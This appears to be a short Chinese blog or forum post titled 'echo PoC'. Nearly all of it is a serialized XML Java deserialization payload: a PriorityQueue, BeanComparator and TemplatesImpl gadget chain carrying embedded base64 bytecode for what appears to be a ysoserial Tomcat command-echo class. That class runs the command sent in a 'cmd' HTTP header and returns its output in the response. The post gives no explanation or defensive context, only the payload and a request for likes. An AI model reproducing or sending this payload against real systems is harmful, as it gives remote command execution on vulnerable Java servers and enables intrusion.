回显poc
cmd: whoami
<java.util.PriorityQueue serialization="custom"><unserializable-parents/><java.util.PriorityQueue><default><size>2</size><comparator class="org.apache.commons.beanutils.BeanComparator"><property>outputProperties</property><comparator class="java.lang.String$CaseInsensitiveComparator"/></comparator></default><int>3</int><com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization="custom"><com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl><default><__name>CODLDMDL</__name><__bytecodes><byte-array>yv66vgAAADMBBQoARQCJCgCKAIsKAIoAjAoAHQCNCAB6CgAbAI4KAI8AkAoAjwCRBwB7CgCKAJIIAJMKACAAlAgAlQgAlgcAlwgAmAgAWAcAmQoAGwCaCACbCABwBwCcCwAWAJ0LABYAnggAZwgAnwcAoAoAGwChBwCiCgCjAKQIAKUHAKYIAKcKACAAqAgAqQkAJQCqBwCrCgAlAKwIAK0KAK4ArwoAIACwCACxCACyCACzCAC0CAC1BwC2BwC3CgAwALgKADAAuQoAugC7CgAvALwIAL0KAC8AvgoALwC/CgAgAMAIAMEKABsAwgoAGwDDCADEBwBkCgAbAMUIAMYHAMcIAMgIAMkHAMoHAQMHAMwBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEALEx5c29zZXJpYWwvcGF5bG9hZHMvdGVtcGxhdGVzL1RvbWNhdENtZEVjaG87AQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACkV4Y2VwdGlvbnMHAM0BAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACDxjbGluaXQ+AQABZQEAIExqYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb247AQADY2xzAQARTGphdmEvbGFuZy9DbGFzczsBAAR2YXI1AQAhTGphdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb247AQAEY21kcwEAE1tMamF2YS9sYW5nL1N0cmluZzsBAAZyZXN1bHQBAAJbQgEACXByb2Nlc3NvcgEAEkxqYXZhL2xhbmcvT2JqZWN0OwEAA3JlcQEABHJlc3ABAAFqAQABSQEAAXQBABJMamF2YS9sYW5nL1RocmVhZDsBAANzdHIBABJMamF2YS9sYW5nL1N0cmluZzsBAANvYmoBAApwcm9jZXNzb3JzAQAQTGphdmEvdXRpbC9MaXN0OwEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEAAWkBAARmbGFnAQABWgEABWdyb3VwAQAXTGphdmEvbGFuZy9UaHJlYWRHcm91cDsBAAFmAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAB3RocmVhZHMBABNbTGphdmEvbGFuZy9UaHJlYWQ7AQANU3RhY2tNYXBUYWJsZQcAzgcAzwcA0AcApgcAogcAmQcAnAcAYgcAxwcAygEAClNvdXJjZUZpbGUBABJUb21jYXRDbWRFY2hvLmphdmEMAEYARwcA0AwA0QDSDADTANQMANUA1gwA1wDYBwDPDADZANoMANsA3AwA3QDeAQAEZXhlYwwA3wDgAQAEaHR0cAEABnRhcmdldAEAEmphdmEvbGFuZy9SdW5uYWJsZQEABnRoaXMkMAEAHmphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbgwA4QDWAQAGZ2xvYmFsAQAOamF2YS91dGlsL0xpc3QMAOIA4wwA2wDkAQALZ2V0UmVzcG9uc2UBAA9qYXZhL2xhbmcvQ2xhc3MMAOUA5gEAEGphdmEvbGFuZy9PYmplY3QHAOcMAOgA6QEACWdldEhlYWRlcgEAEGphdmEvbGFuZy9TdHJpbmcBAANjbWQMAOoA6wEACXNldFN0YXR1cwwA7ABeAQARamF2YS9sYW5nL0ludGVnZXIMAEYA7QEAB29zLm5hbWUHAO4MAO8A8AwA8QDeAQADd2luAQAHY21kLmV4ZQEAAi9jAQAJL2Jpbi9iYXNoAQACLWMBABFqYXZhL3V0aWwvU2Nhbm5lcgEAGGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcgwARgDyDADzAPQHAPUMAPYA9wwARgD4AQACXEEMAPkA+gwA+wDeDAD8AP0BACRvcmcuYXBhY2hlLnRvbWNhdC51dGlsLmJ1Zi5CeXRlQ2h1bmsMAP4A/wwBAAEBAQAIc2V0Qnl0ZXMMAQIA5gEAB2RvV3JpdGUBAB9qYXZhL2xhbmcvTm9TdWNoTWV0aG9kRXhjZXB0aW9uAQATamF2YS5uaW8uQnl0ZUJ1ZmZlcgEABHdyYXABABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAqeXNvc2VyaWFsL3BheWxvYWRzL3RlbXBsYXRlcy9Ub21jYXRDbWRFY2hvAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAFWphdmEvbGFuZy9UaHJlYWRHcm91cAEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQAQamF2YS9sYW5nL1RocmVhZAEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwEADmdldFRocmVhZEdyb3VwAQAZKClMamF2YS9sYW5nL1RocmVhZEdyb3VwOwEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwEAEGdldERlY2xhcmVkRmllbGQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAHZ2V0TmFtZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBAA1nZXRTdXBlcmNsYXNzAQAEc2l6ZQEAAygpSQEAFShJKUxqYXZhL2xhbmcvT2JqZWN0OwEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAdpc0VtcHR5AQADKClaAQAEVFlQRQEABChJKVYBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVydHkBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAC3RvTG93ZXJDYXNlAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABXN0YXJ0AQAVKClMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7AQAEbmV4dAEACGdldEJ5dGVzAQAEKClbQgEAB2Zvck5hbWUBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQALbmV3SW5zdGFuY2UBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEAEWdldERlY2xhcmVkTWV0aG9kAQA4eXNvc2VyaWFsL3BheWxvYWRzL3RlbXBsYXRlcy9Ub21jYXRDbWRFY2hvNTU3NTA3NTE3ODk2MTkBADpMeXNvc2VyaWFsL3BheWxvYWRzL3RlbXBsYXRlcy9Ub21jYXRDbWRFY2hvNTU3NTA3NTE3ODk2MTk7ACEARABFAAAAAAAEAAEARgBHAAEASAAAAC8AAQABAAAABSq3AAGxAAAAAgBJAAAABgABAAAACQBKAAAADAABAAAABQBLAQQAAAABAE0ATgAC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</byte-array><byte-array>yv66vgAAADMAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAxwAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ</byte-array></__bytecodes><__transletIndex>-1</__transletIndex><__indentNumber>0</__indentNumber></default><boolean>false</boolean></com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl></com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl><com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference="../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"/></java.util.PriorityQueue></java.util.PriorityQueue>
若有收获,就点个赞吧
0 人点赞
